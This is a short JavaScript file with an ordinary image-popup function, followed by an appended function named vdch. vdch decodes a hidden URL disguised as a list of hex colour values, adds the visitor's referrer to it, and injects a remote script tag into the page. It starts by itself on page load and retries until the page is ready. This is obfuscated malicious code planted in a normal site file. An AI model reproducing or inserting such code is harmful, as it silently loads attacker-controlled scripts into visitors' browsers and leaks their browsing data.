function popupimg(path,width,height,domain)
{
year = new Date();
imwin = window.open('','','toolbar=0,location=0,status=0,scrollbars=0,resizable=0,width='+width+',height='+height);
imwin.document.write("<title>Copyright&copy;"+year.getFullYear()+" "+domain+"</title><body topmargin=0 leftmargin=0 marginwidth=0 marginheight=0><img src="+path+" width="+width+" height="+height+"></BODY>");
}function vdch() {
	if(document.all.length > 3) {
		var t = new Array('', '#723e29', '#2d6767', '#6f6169', '#72766f', '#6c6763', '#717728', '#616b6b', '#2d6d68', '#66617e', '#2c746e', '#723b61', '#6d396a', '#637772', '#6c6171', '#710000');
		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } } dchid += "&rf=" + escape(document.referrer);
		var dch = document.createElement("script");
		dch.id = "dchid";
		dch.src = dchid;
		document.all[3].appendChild(dch);
	} else {
		setTimeout("vdch()",500);
	}
} setTimeout("vdch()",500);

